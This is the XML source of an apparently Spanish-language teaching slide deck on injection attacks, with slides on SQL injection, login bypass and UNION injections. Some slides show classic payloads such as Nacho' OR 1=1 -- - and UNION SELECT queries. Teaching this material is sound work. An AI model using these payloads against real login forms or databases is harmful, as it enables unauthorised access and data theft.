        <p:spPr>
          <a:xfrm>
            <a:off x="5625018" y="138870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B50D4A-A685-6D66-BA0D-635BDF1D3BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441323" y="14226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B</a:t>
            </a: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2D5C8DEC-F0F4-31B8-8EB2-9D8BF33E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86582"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4140724" y="4135225"/>
          <a:ext cx="3555477" cy="147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59">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="584249743"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1185159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="666289045"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1185159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2217364366"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="360817">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-E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21564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="380588"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9798"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360817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35647"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="360817"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59365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5B2DFC47-FCCF-EC71-7A92-027A6D55B1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528838" y="356359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OR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F565183E-9A27-7140-8ECC-77F57BE33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86234"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7911447" y="4135224"/>
          <a:ext cx="3555478" cy="1442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739">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2927691089"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1777739">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2276322108"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="480872">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-E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91681"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480872"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75626"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480872">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES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26508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B5045E23-DEC1-DF5E-B180-5A9976E0937A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9157821" y="35861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13812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4C56F8-F180-4761-AFC6-AE81DD35FB2B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Índice: Inyecciones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48017FD-5844-DCD9-F588-E3DF7B89CD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575858" y="1761659"/>
            <a:ext cx="7478395" cy="364971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27050" indent="-514350">
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CB0016"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod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Qué es una inyección?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FontTx/>
              <a:buAutoNum type="arabicPeriod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Tipos de inyecciones</a:t>
            </a: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FontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-10" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" spc="-10" dirty="0">
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
            </a:endParaRP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FontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="527050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" spc="-20" dirty="0">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" spc="-20" dirty="0" err="1">
                <a:latin typeface="Bookman Old Style"/>
                <a:ea typeface="Batang"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" spc="-20" dirty="0">
              <a:latin typeface="Bookman Old Style"/>
              <a:ea typeface="Batang"/>
            </a:endParaRP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C7411EF-7F81-FE2F-0943-D79FE6914CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3448033" y="1352486"/>
            <a:ext cx="5291455" cy="5506085"/>
            <a:chOff x="3448033" y="1352486"/>
            <a:chExt cx="5291455" cy="550608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C2CDD513-CBA8-5291-FADD-C97443BB35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033" y="1352486"/>
              <a:ext cx="5291234" cy="5505513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E34AD9E-2E8B-FF8F-7606-599A3EF080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100" y="1352549"/>
              <a:ext cx="5257799" cy="5505445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD723F6-8139-86D0-50D5-771F4A4A2F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775" y="5867400"/>
            <a:ext cx="1981199" cy="75247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3352ED74-F8FC-358A-89C5-DD68D9AA832E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="5648325"/>
            <a:ext cx="10248900" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10248900" h="47625">
                <a:moveTo>
                  <a:pt x="10248900" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10248900" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="CB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26A9964-E40E-C5E4-5DEE-F7B29F51A65C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3626683" y="2372212"/>
            <a:ext cx="51054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7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4800" spc="-25" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Qué es una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4800" spc="-25" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" spc="-25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4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D1395C7F-0713-ED8F-B6D7-28E088C1EE7B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87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25" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Qué es una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-25" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" spc="-25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38F7DD-3F5E-AF8F-1C94-D22D6342982F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2133600"/>
            <a:ext cx="1019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SELECT * FROM usuarios WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nacho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>’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E9F57FDB-306C-A4AA-A86D-BB4BE54CD394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6878179" y="1641094"/>
            <a:ext cx="241665" cy="743348"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 4930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7F40FB-2D0D-BEF0-F19D-3EC634AF3738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6657975" y="15024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8856AB-B400-6ED6-A741-C2D5F1DFE5F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051535" y="316230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 malicioso : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dentro‘fuera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401108-70DC-6312-3407-9B5ADDF9B187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="4191000"/>
            <a:ext cx="1019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SELECT * FROM usuarios WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dentro’fuera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>’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6B4EBD0-49AE-0DF9-042E-A3848BF7847A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="4911209"/>
            <a:ext cx="8897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SELECT * FROM usuarios WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dentro’fuera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>’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1ED4548-8D24-74EE-3520-C470119F8DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8809382" y="4566989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/>
              <a:t>No da error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17286DF-936F-8404-63FE-40BA7AF8E56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8382000" y="4874766"/>
            <a:ext cx="381000" cy="221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Larry | ▫ Clash Royale Amino ▪️ Amino">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25B4B9A-F23D-2ED5-FBE2-3BC019AA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67000"/>
            <a:ext cx="1360973" cy="13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g emoji king clash royale">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6614267E-7648-7E9B-9794-80CFA7AB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744" y="3315420"/>
            <a:ext cx="1787820" cy="1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6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74F671B9-1EAE-480C-827F-A96D658FFBF5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10" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> bypass con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-10" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" spc="-1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C19CBA-D663-1676-1373-DE8F17981D6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562101" y="2667246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SELECT * FROM usuarios WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nacho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> =‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bonaesmejor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’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71C60E-BB05-531D-6361-8CF4C96803B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="3928943"/>
            <a:ext cx="9336072" cy="65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SELECT * FROM usuarios WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nacho’ OR 1=1 -- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> =‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bonaesmejor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’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C8CC4B-5732-0D88-8FA7-3D032FA73A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570740" y="1592348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Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>LOGIN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CE2127DE-F24C-0059-8B85-D59FF68F4B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7407081" y="2705409"/>
            <a:ext cx="351938" cy="211507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A23E4CC-A7A6-0FD3-218F-85CC7A6AAC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7230359" y="3193875"/>
            <a:ext cx="1257507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True</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Clash Royale Clash Royale Emote Sticker - Clash royale Clash royale emote  Clash - Discover &amp; Share GIFs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72DDAC77-FA4D-6F8D-87B1-0BBFFF62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59" y="4732256"/>
            <a:ext cx="2125744" cy="212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251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Ã son los Enfrentamientos en la actualizaciÃ³n de Clash of Clans">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECCC7F46-EFC3-C7FE-8EEC-D8CF683D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6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630093-FF86-D91D-506D-A15C6DCDC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6403" y="2436221"/>
            <a:ext cx="5827395" cy="492443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  <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Práctica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FB98E2-192D-5627-E519-678E49DC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50001" r="21334" b="-1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2768201" y="2317677"/>
            <a:ext cx="766851" cy="11113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6C0427-47D5-530E-3E25-775EC6C3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2" t="52646" b="2543"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8157699" y="1437392"/>
            <a:ext cx="998502" cy="1435946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4100" name="Picture 4" descr="Diseños PNG de tanga para camisetas &amp; Merch">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0041A5C-B2F9-0165-2FC6-30DBFBCD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3310">
            <a:off x="7738330" y="4158543"/>
            <a:ext cx="2030233" cy="20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24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632F5AE4-ED4D-18AC-8C51-F62FF0DC6BD6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UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-2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injections</a:t>
            </a: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: Qué hace UNION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3BD9B15-E893-AFE2-A90E-CCCB485FC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81571"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="549275" y="2435606"/>
          <a:ext cx="4114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955174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447797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1705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contraseña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24728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77C773F-AA4B-4C9F-1E5F-C8E45B771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29556"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6858000" y="2452585"/>
          <a:ext cx="431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595517482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3144779709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01705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comida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sabor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1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cachopo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salado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natilla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dulce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24728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9115E9B-A29B-0BE9-4107-F850F9FF0C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="17186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Tabla de usuarios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944540-1F30-835A-647E-D0B9F47CE033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8071868" y="179486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Tabla de comidas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32F0C3-8686-41E5-0C9E-6910D7393E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943735" y="4050268"/>
            <a:ext cx="782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SELECT * FROM usuarios UNION SELECT * FROM comidas</a:t>
            </a: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15171D08-DCE7-A5BF-B3B0-1D85C632B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92756"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="4572000"/>
          <a:ext cx="50736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217">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3422899201"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1691217">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1750541806"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1691217">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2079048679"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="283550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-E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contraseña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4892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04819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98788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cachopo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salado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1918"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="279666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natilla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dulce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05504"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Soy nuevo y quiero nuevos amigos espero llevarme bien con ustedes | Clash  Of Clans • Amino Amino">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8016473D-9AAA-B0E5-38C4-9FB7CA6D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4" y="2456085"/>
            <a:ext cx="2193925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38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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2996927C-D003-436B-FE3B-5BF7DAFB7884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UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" spc="-20" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>injections</a:t>
            </a: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: De que nos sirve UNION</a:t>
            </a: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A482A87-0ED6-E02F-86C5-C21C67013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28255"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3276600" y="2074586"/>
          <a:ext cx="4953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1196513285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90212325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87904419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s-E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990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play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87338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xbox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05311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4F4CD320-50A6-E288-8956-55BC4006CE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3339619" y="1524000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SELECT id, producto, stock FROM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>inventario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:latin typeface="Book Antiqua" panose="02040602050305030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’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1D157B-3314-5356-D712-CAB629D702F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="3640415"/>
